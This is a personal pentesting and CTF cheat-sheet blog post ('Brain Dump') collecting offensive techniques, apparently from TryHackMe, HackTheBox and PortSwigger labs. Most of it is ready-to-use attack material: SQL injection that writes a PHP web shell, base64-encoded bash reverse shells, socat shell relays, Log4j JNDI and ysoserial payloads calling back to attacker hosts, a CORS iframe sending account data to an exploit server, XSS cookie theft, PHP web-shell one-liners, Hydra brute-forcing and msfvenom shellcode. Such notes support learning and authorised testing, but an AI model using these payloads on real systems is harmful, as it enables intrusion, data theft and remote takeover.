---
title: Brain Dump
date: 2022-01-26
categories:
  - Notes
tags:
  - Notes
excerpt_separator: <!--more-->
toc: true
toc_sticky: true
image: braindump.png
platform: notes.png
---

Collection of things that help me remember stuff. Everything that I learned from CTFs, Jobs etc. will be dumped here. Churr!

<!--more-->

## Samba

### Enum4linux

try and look for usernames

### smbclient

`smbclient -L <IP>`

### Smbmap

`smbmap -H <IP>`

## SQLi
[Nice cheatsheet from hofmannsven](https://gist.github.com/hofmannsven/9164408)    

`SELECT name, description FROM products WHERE id=9;` **_--- queries the db for name and desc in product table where id=9_**    
`SELECT -column list- FROM -table- WHERE -condition-` 

Example vulnerable code

`$id = $_GET['id'];`

`"SELECT name, desc FROM productes WHERE ID='$id';";`

`'a OR 'a'='a`

`SELECT name, desc FROM products WHERE ID='' OR 'a'='a';`

### Union
`SELECT <statement> UNION <other> SELECT statement;`  

`SELECT name, description FROM Products WHERE ID='3' UNION  SELECT username, password FROM accounts`  

With group_concat **_--- use when there's only 1 column? and sql is only showing the first entry_**

`0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'`
**_sqli_one = db_**

`0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'`  
**_staff_users = table_**

### What to do when there is a confirmed injection point

Determine how many columns using:

`' UNION SELECT null;-- -` **_or by using ORDER BY #-- -_**

`' UNION SELECT 'asd', 'asd';-- -` **_asd should appear somewhere_**

**_NOTE Check if it accepts string or integer_**

After enumerating the number of columns continue with Union injections

### Querying Version, db, Table_name, user()

`1 union select 1, @@version, 3, 4`

`1 union select 1, database(), 3, 4`

`1 union select 1, table_name, 3, 4 fomr information_schema.tables`

`1 union select 1, column_name, 3, 4 fomr information_schema.columns`

`' UNION SELECT user(), 'asd';-- -`

One column available get username and password **_or group_concat maybe?_**

`'+UNION+SELECT+NULL,username||'~'||password+FROM+users--`


### Blind SQLi / Manual Bruteforce

`select substring(user() , 1, 1) = 'r';`  

`' or substr (user(), 1, 1)= 'a`  

`admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';`

`admin123' UNION SELECT 1,2,3 where database() like 's%';--`

`admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--`

`admin123' UNION SELECT 1,2,3 from users where username like 'a%`

#### Blind SQL in a cookie

`TrackingId=xyz'||(SELECT '' FROM dual)||'` **_test on cookie header TrackingId is a cookie_**

`'||(SELECT Case When (1=1) then to_char(1/0) else '' end FROM dual)||'`

`'||(SELECT Case When (1=1) then to_char(1/0) else '' end FROM users where username='administrator') ||'`

`'||(SELECT Case When (1=1) then to_char(1/0) else '' end FROM users where username='administrator' and lenght(password)>1) ||'`

`'||(SELECT Case When (1=1) then to_char(1/0) else '' end FROM users where username='administrator' and substr(password,1,1)='a') ||'`

**_Limit output of rows = rownum=1  ---same as Limit 1 for mysql_**
**_This is syntax is for oracle - Dual is a default table_**

### Uploading Shell SQLi

-  `<value>' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E-- -`
   -  `INTO OUTFILE '/var/www/html/shell.php` **_output file to shell.php /var/www/html most common default location_**
   -  `0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E` Hex of `<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";?>` **_or hex of the actual php reverse shell from pentest monkey_**

### SQLMap

`sqlmap -u <URL> -p <injection parameter> [options]`

`sqlmap -u "http://test.site/view.php?id=1" -p id --technique=U` **_technique used is Union_**

`sqlmap -u "http://test.site/view.php?id=1" --tables`

`sqlmap -u "http://test.site/view.php?id=1" --current-db <dbname> -columns`

`sqlmap -u "http://test.site/view.php?id=1" --current-db <dbname> --dump`

`sqlmap -u "http://test.site/view.php?id=1" -D <dbname> -T <tablename> -C <Column> --dump1`

For Post Params/data

`sqlmap -u <URL> --data=<POST STRING> -p <PARAMETER> [options]`

Sometimes you don't need the **'**

`id=1 OR 1=1`

## NoSQLi

### MongoDB

[PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
- default port is 2701
- mongo to start - show databases, use whatever
- `db.createCollection("users")` , `db.users.insert({id:"1", username: "admin", email: "admin@test.test", password: "password"})` , `db.users.find()` , `db.users.update({id:"2"}, {$set: {username: "test"}});`
- `.bson` supports json
- `username[$eq]=admin&password[$ne]=asd`
- collections = tables, documents = rows, fields = columns
- $and = AND, $or = OR
   - $eq = matches records that equal to a certain value
   - $ne = matches records that are not equal to a certain value
   - $gt = matches records that are greater than a certain value.
   - $where = matches records based on Javascript condition
   - $exists = matches records that have a certain field
   - $regex = matches records that satisfy certain regular expressions.

## Bruteforcing

### Basic Auth

`hydra -L user.txt -P rockyou.txt <machine-ip> http-head /` 

`hydra -L user.txt -P rockyou.txt <machine-ip> http-get /`

### SMB

`hydra -L user.txt -P rockyou.txt -m <domain> <ip> smb` **_or metasploit_**

## TCPdump

### Monitor your injections with tcpdump

Ping yourself and run `tcpdump -i <interface> icmp`  

## Pivoting/PortForwading/Tunneling

### Used msfconsole muti/handler

[Therennox YOTF writeup](https://therennox.github.io/thm/yearOfTheFox)   

### Socat

Opening 8888 in the victim to connect to victim 22 **_in this scenario only localhosts is allowed to victim 22_**  
`/tmp/socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22`  
read more here [Muirlandoracle YOTF writeup](https://tryhackme.com/resources/blog/year-of-the-fox-official-write-up) or [H0j3n's](https://h0j3n.medium.com/tryhackme-year-of-the-fox-631c7752fab2)

#### Reverse Shell Relay

`./socat tcp-l:8000 tcp:ATTACKING_IP:443 &`
   - tcp-l:8000 = used to create the first half of the connection -- ipv4 listener on tcp port 8000 of the victim
   - tcp:attacking_ip:443 = connects back to our local IP on port 443
   - & =  backgrounds the listener

This will connect back to our machine so we need to setup a netcat listener

`./nc-hyst 127.0.0.1 8000 -e /bin/bash`

#### Port Forwarding using Socat

`./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &`

- Watch [IPPSEC](https://www.youtube.com/watch?v=Auqt-NSB4SQ)

### ProxyChains

- proxy a netcat `proxychains nc 172.16.0.10 23`

- when using nmap w/ proxychains comment out proxy_dns inside the proxychains.conf file

- only tcp scan will work

- udp, syn and ping scan wont work - use -Pn

### Port Forwarding 

Local: From attacker to victim via SSH

**_Attacker --ssh--> 172.16.0.5 --http--> 172.16.0.10_**
- `ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN`
   - f = backgrounds shell immediately
   - N = tells SSH that it doesn;t need to execute any command and just set up the connection 

Now we can access the webserver on 172.16.0.10 using our own box localhost:8000
**_Use this when victim-localhost has open port that is only accessible by victim-localhost itself_**

### Reverse Connection

When doing this to avoid reverse shell and to only allow port forwarding add `command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty` at the beginning of the public key.

**_We have a shell on victim(05) and we want to use it as a reverse connection from our machine(20) to webserver_victim(10)_**
- `ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN`

### Plink.exe for Windows

Command Line version of PuTTY SSH Client

**_Reverse Connection from Victim to our Attacker Machine._**
**_.20 Attacker --- .05 Victim we have a shell from --- .10 Webserver_**
- `cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N`

For the keyfile we need to convert it using puttygen tool
- `puttygen KEYFILE -o OUTPUT_KEY.ppk`

### Reverse SSH Tunnel 

Use when port is only accessible by victim local

`ssh -L 4444:10.10.125.232:8080`
   - 4444 port of victim you will access from outside
   - 10.10.125.232 victim's ip
   - 8080 local port you want to access inside the victim

## Useful WEB Enumeration stuff

### Authentication

- Check created cookie is it a hashed value of user? change
- admin exist? try registering Admin
- add space before and after admin
- redirects to `/login.php` from `/` try intercepting response and change 302 Not Found to 200 OK
- Blacklisted? is `X-Forwarded-For header` allowed?
- Check timing might be different for username enumeration, make password extra long then check response time
- Blacklisted after a few tries? try alternating correct creds with bruteforced creds
- Valid users gets locked out **_Can be used to enum valid users_**

#### 2FA

- Manually access /account-page when asked for 2fa? might be able to bypass

#### Password Reset bypasses

- Use X-Forwarded-Host header. `X-Forwarded-Host: your-exploit-server-id.web-security-academy.net`  **_REMOVE HTTPS_**
   - log should show unique token for the victim

#### SAML

- b64decode SAMLResponse - Important Part is **_<NameID...>_**
   - Start SAML interaction > Intercept SAMLResponse > Tamper SAMLResponse > Forward Malicious SAMLResponse to SP
   - Base64 Decode SAMLResponse > Change **_<NameID..youremail>_** to **_<NameID..adminemail>_**

#### Outh2

- CSRF vulnerabilities

### Authorization

- IDOR
   - Can't IDOR directly? try in Edit, Delete, Modify etc.
   - add .json extension?
- Object with multiple attributes when signing up
   - `user[username]=evo&user[password]=evo&submit=Submit` **_maybe add user[admin]=true or 1? admin can also be exchanged to other stuff like organisation_id etc whatever is in use to bypass Authorization_**

### Code Injection

- Test with `'` `"` in every params just like sql. Some might give an error. **_we want it to error out then add a concat character(depends on what is used by website) example `"+"` for ruby. Or `""` maybe. NOTE:REMEMBER TO URL ENCODE `+` `%2b`_**
   - Errors out with `"`? try `example.com/?test=evo".system("id")."` **_`.` is used to concat in PHP_**
   - when website is sorting via PHP try to input `'` or `"` again
   - PHP version below 5 - Notice /pattern/? inject to /pattern/e then insert command phpinfo() to verify
   - '.phpinfo().' - replace phpinfo() with system("id") or what ever command
      - Ruby
         - `+` for concat
         - command inside ` 
      - Perl
         - `.` for concat
         - command inside `
      - Python [Sethsec](https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html)
         - `+` for concat
         - `str(os.popen("ls").read())`
         - `str(__import__('os').system('id'))`
         - `str(__import__('os').popen('id').read())`
         - `str(__import__('os').popen(__import__('base64').base64decode('<command in base64>')).read())`
- Check browser network if it's loading any injectable params         
### Command Injection

- Try all characters for chaining commands [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#chaining-commands)
- Straight out try *backtick* `reverse shell or ping` *backtick* or `$(<command>)` [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#inside-a-command)
- try adding `;` `&` `|` `||` at the end of the command aswell. EX: `email=all3n@evo.test|sleep+5|`
- there's a script in etc
- blind and can't get a shell? maybe there's a writable directory /images? whoami>/var/www/images 

#### This worked for the year of the fox challenge

Client side filtering for symbols - used burp to bypass filtering   

`"target":"\" ; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjE0LjUxLzcwMDMgMD4mMQ== | base64 -d | bash; echo\""` **_this is a post request inside a search function_** 
`\` escapes the `"` character

### Directory Traversal

- `../../../../../../../etc/passwd`
- try reading the php file with the parameter ex: `file.php?file=/var/www/file.php`
- If it loads blank maybe it requires you to start with specific directory. ex: this one requires to start with `/var/www` `file.php?file=/var/www/../../../../../etc/passwd`
- add %00 at the end `../../../../../etc/passwd%00` **_fixed in php version 5.3.4_**
- try `/etc/passwd` without the `../../../../`
- `....//....//....//....//....//etc/passwd`
- double url encode

### File Inclusion

- Loads php files - look for something like `?page=index.php` try injecting a `'` or `"` if it errors out
- Normal Directory traversal will work 
- Try injecting remote sites like `http://www.google.com` or your own controlled site `/?page=http://evohaxthepla.net/test.txt&cmd=id` **_test.txt contains a php one liner_**
- look for the following in the source code: 
   - `include`
   - `require`
   - `include_once` 
   - `require_once`
- `php://filter/resource=/etc/passwd`
- `php://filter/convert.base64-encode/resource=/etc/passwd`
- LFI to RCE via Log files
   -  include a malicious payload into services log files such as Apache, SSH, etc. then request log file via LFI
      - Example, a user can include a malicious payload into an apache log file via User-Agent or other HTTP headers. In SSH, the user can inject a malicious payload in the username section. 
      - `echo '<?php echo 'whatever    ';system($_GET['cmd']);?>'` > whatever.php 

### LDAP

- Test with `)` if you'll get an error [PayloadAllthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)
- In a post request when signing in remove the whole post body ex: `username=asd&password=asd` delete this whole data.
- `adm*))%00`
-  `admin)(cn=*))%00&password=admin`

### Open Redirect

[PayloadAllthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect)
- webhook.site **_can be used to test?_**
- http and https is filtered can be bypassed by just doing `//google.com` **_check payloadallthethings for more_**

### CSRF

- Remove CSRF token
- Change POST to GET
- CSRF token is not user specific 
   - Intercept CSRF thru proxy then drop it - use the intercepted CSRF token on the other account check if it works

### SSRF

[Owasp](https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf#page=9&zoom=100,96,210)

- Basically look for areas where the victim sends a request or downloads from another location ex: `assets.test.com`. And then try accessing localhost or other payloads. [PayloadAllthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)

### SSTI

- Nice labs from [PortSwigger](https://portswigger.net/web-security/all-labs)
- Look for injectable parameters and then fuzz - [PayloadAllthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Intruder/ssti.fuzz) has a good wordlists.
- Check template statements like ex: dropdown where you can choose if you want to display firstname, Lastname etc. try to break out of the template statement `firstname}}{{7*7` [Port Swigger](https://portswigger.net/research/server-side-template-injection)
- Tornado lab in portswigger this worked `}}{%+import+os+%25}{{os.system('whoami')}}` [hacktricks](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection)
- ex: `{% import os %}{{ os.popen("whoami").read() }}`
- After finding a vulnerable parameter and determining what template engine is used. go to [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) to check for code executions.


#### TPLMap

- Python2 only 
- Snowscan usage of TPLmap on OZ HTB - [Snowscan](https://snowscan.io/htb-writeup-oz/#)

### File Upload

- [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files)

### XML

- Try gobusting for files that ends with xml aswell and anyother types txt,csv,bak etc.

#### XXE

- [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection)
- Check white spaces - only one newline from header!
- [Informit](https://www.informit.com/articles/article.aspx?p=27006&seqNum=3) XML structure
- Delete % from payloads you get in PayloadAlltheThings.

#### XPATH

- [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
- `' or 1=1}/parent::*/child::node()%00`

### XSS 

- js cab access cookies if they **_DO NOT HAVE_** the `httpOnly` flag enabled.
- [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
- Test in all inputs and params
- `<script>fetch('/settings?new_password=pass123');</script>`?
- all tags blocked? use custom tag 
```javascript 
   <script>
   location = 'https://acd21f001f9a7723c0f207c1008700d5.web-security-academy.net/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x';
   </script>
```
- not sure but this worked, from burpsuite acad `%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E`


### JWT

[Hacktricks](https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens)
[Netsparker JWT attacks](https://www.netsparker.com/blog/web-security/json-web-token-jwt-attacks-vulnerabilities/)

- HEADER, PAYLOAD, SIGNATURE **_Decode from base64_**
- Try setting ALG to "none" **_should be small letters and then urlencode ==_** then remove signature but leave the last `.`
- If you have the public key and the token is using RS256 > change to HS256 **_Script in /etc_**
- If there's a Key ID or KID in the Header part - test for SQLi or Directory Traversal. `"kid":"../../../../dev/null"` **_this will sign the token with dev/null which is empty_**
- Sometimes the output is not in quotes try to add quotes ex output: `{"user":admin}` make it `{"user":"admin"}` before encoding to base64 **_Edit: looks like this only applies in scripting, if done in jwt.io do not add quotes. still need to confirm_**
- try to replace kid value with command execution see Hacktricks link
- From pentesterlab `{"typ": "JWT", "alg": "HS256", "kid": "|<command>"}` **_CVE-2017-17405 impacting Ruby Net::FTP_**
- bruteforce jwt secret using john `john jwt.token --wordlist=wordlist.txt --format=HMAC-SHA256`
- SQLi in jwt see Hacktricks link. `' UNION SELECT 'ATTACKER';-- -` then set the secret to `ATTACKER`
- Sometimes they don't even verify the signature, so just try changing the user to admin.
- `jku` header devs can use public key from URLs inside using the jku header, attackers can host their self signed jwk file.


### CORS Misconfiguration

- Check for *Access-Control-Allow-Origin:* and *Access-Control-Allow-Credentials:* in response.
- Add Origin header in request - try `Null`
- More payloads [PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration)

```javascript
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','$url/accountDetails',true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
    location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
  };
</script>"></iframe>
```

### Git Information Leak

- Check for `.git` directory
- `wget -r` then `git diff` `git diff HEAD~1 or 2` and so on to show previous commit changes
- `.git` might not be accessible but `/.git/HEAD` or `config` might be. nice to check.
- `git log`
- Don't forget to `git init`
- first 2 characters is directory `c3646db7f9c7e6f126c75900fdcce16d50e1da82` = `/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82`
- `git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82`

## FTP

- FTP SSL? `openssl s_client -connect <ip>:<port> -starttls ftp`
- lftp 
```
lftp
set ftp:ssl-force true
set ssl:verify-certificate no
connect <ip>
username
```


## NFS

- showmount -e `ip`
- mount `10.10.10.10:/share`

## Serializations

### PHP

- Adding Tilde(~) when requesting PHP might show the source code
- look for _destruct() or _wakeup() [Owasp](https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection)   


## Log4j

- `java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "https://c6c9-202-89-151-235.ngrok.io:8888/log4jrce"`
- `${jndi:ldap://10.10.14.2:1337/a}`
- [ysoserial-modified](https://github.com/pimps/ysoserial-modified)
   - `java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.14.6/9002 0>&1' > ~/htb/logforge/ysoserial.ser` **_Creates a serialized payload_**
- [JNDI-exploit-kit](https://github.com/pimps/JNDI-Exploit-Kit)
   - `java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.6:1389 -P ~/htb/logforge/ysoserial.ser` **_Listens to port 1389 then sends ysoserial.ser_**
   - after running ysoserial-modified we will get links for different versions for jdk to try out. `${jndi:ldap://10.10.14.6:1389/vojbuj}`
- `${jndi:ldap://10.10.14.2:1337/${sys:java.class.path} or ${java:version} or ${java:os}}` **_or can be replaced with .... to do nested thingy_**
- Using JRMPListener to send CommonsCollections `java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsCollections5 "**_CMD_**"` **_this will set up a listener listening on port 1337. send your payload `${jndi:rmi://10.10.10.10:1337/a}` and should receive something.
```Java
public class Log4jRCE {
    static {
        try {
            String [] cmd={"touch", "/tmp/TEST"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}
```

## Apache

- Apache on 80 Tomcat on 8080
- encoding of .. = %252e%252e

### Tomcat 
[Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
- access manager bypass `<ip>/whatever/..;/manager/html`
- `msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.14.2 LPORT=9001 -f war -o hyst.war`
- `/manager/html/expire?path=/` **_0xdf used this to test for log4j using Post and jndi payload as body_**


## One-Liners

- `<php system($requests['hyst']); ?>`
- `<?php system($_GET["cmd"]);?>`
- `<?php print exec('command'); ?>`

## ShellShock

- `() { :;}; echo; **_CMD_**`
- Echo is used to add a blank space between headers and body output

## C app

- Use gdb / strace
- crash the app then have a look at `/var/crashes` use `apport-unpack`

## GPG/PGP/ASC

- `gpg2john test.asc > hash`
- `john --format=gpg hash --wordlist=rockyou.txt`
- `gpg --import <file.asc>`
- `gpg -d <creds.gpg>`

## CBC-MAC

- **_IV_** is set as a cookie in response after logging in


## GraphiQL

- Look for **_/graphql_** enpoints - might show web based IDE - or convert the following to proper json and use burp - replace newline with \n? and then insert it to query part of the post body.

<details>
  <summary>Recent Versions</summary>
  
  ```sql
  query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {
        name
        description
        args {
          ...InputValue
        }
        locations
      }
    }
  }

  fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
      name
      description
      args {
        ...InputValue
      }
      type {
        ...TypeRef
      }
      isDeprecated
      deprecationReason
    }
    inputFields {
      ...InputValue
    }
    interfaces {
      ...TypeRef
    }
    enumValues(includeDeprecated: true) {
      name
      description
      isDeprecated
      deprecationReason
    }
    possibleTypes {
      ...TypeRef
    } 
  }   
      
  fragment InputValue on __InputValue {
    name
    description
    type { ...TypeRef }
    defaultValue
  }     
        
  fragment TypeRef on __Type {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
        }
      }
    } 
  }
  ```
  
</details>

<details>
  <summary>Older Versions</summary>

  ```sql
  query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {
        name
        description
        args {
          ...InputValue
        }
        onOperation
        onFragment
        onField
      }
    }
  }

  fragment FullType on __Type {
    kind
    name
    description
    fields(includeDeprecated: true) {
      name
      description
      args {
        ...InputValue
      }
      type {
        ...TypeRef
      }
      isDeprecated
      deprecationReason
    }
    inputFields {
      ...InputValue
    }
    interfaces {
      ...TypeRef
    }
    enumValues(includeDeprecated: true) {
      name
      description
      isDeprecated
      deprecationReason
    }
    possibleTypes {
      ...TypeRef
    }
  }

  fragment InputValue on __InputValue {
    name
    description
    type { ...TypeRef }
    defaultValue
  }

  fragment TypeRef on __Type {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
        }
      }
    }
  }
```  
</details>

```sql
query MyQuery {
   __schema {
    types {
      name
      fields {
       name
      } 
    
    }
  }
}
```
``` sql  
  query Query {
  ptlabkeys {
    value
  }
}
```
## Source Code Reviews

### PHP

- Directory Traversal
```php
public static function list_files_for_user($username) {
	  $base = "files/".$username;  ### Vulnerability as user controlled input is getting concatenated. user input can be `../../../etc/passwd?`
	  if (!file_exists($base)) {
	    mkdir($base);
	  }
	  return array_diff(scandir($base), array('..', '.'));
	}
```
- File Upload Bypass
```php
	  public static function addfile($user) {
	  $file = "files/".basename($user)."/".basename($_FILES["file"]["name"]);
	  if (!preg_match("/\.pdf/", $file)) { #Does not stop the user from uploading shell.pdf.php need to add $ to properly regex.
	    return  "Only PDF are allowed";
	  } elseif (!move_uploaded_file($_FILES["file"]["tmp_name"], $file)) {
	    return "Sorry, there was an error uploading your file.";
	  }
	  return NULL;
	}
```

### ASP.NET 

- Views = contains html pages **_.cshtml extension_** = c#html, gets list of data from controller
- Model = data related = classes, sql statements, gives controller with list of objects

## Google Dorks

- site: include only results on a given hostname.
- intitle: filtest according to the title of a page.
- inurl: filters according to url of a resource.
- filetype: filters according to file extensions.
- `-` filters out keywords

## Buffer Overflow BOF

- Main goal is to overflow buffer space to overwrite EIP(Extended Instruction Pointer)

Steps in BOF

- Spiking: Finding vulnerable part of the program
- Fuzzing: Sending characters to the vulnerable part of the program to break it
- Finding Offset: This is where the program crashes
- Overwrite the EIP using the Offset found
- Find the right module
- Shellcode

Tools

- Immunity Debugger
- generic_send_tcp

### Spiking 

- readelf -s `program`

```C
  s_readline();
  s_string("TRUN ");
  s_string_variable("0");
```

### Metasploit module for pattern

```bash
pattern_create.rb -l "bytes"
pattern_offset -l "bytes" -q "what data is in EIP HEX"
```

[Bad Character Checker](https://github.com/cytopia/badchars)

### Finding Modules

- [Finding Modules - Mona](https://github.com/corelan/mona)
- nasm_shell.rb
- `msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT EXITFUNC=thread -f c -a x86 -b "badcharacters"`

### Shell example

- `shellcode= "A" * 2002 + "\xaf\x11\x50\x62 - this address is from nasm_shell.rb JMP ESP" + "\x90" * 32 + overflowfrommsfvenom`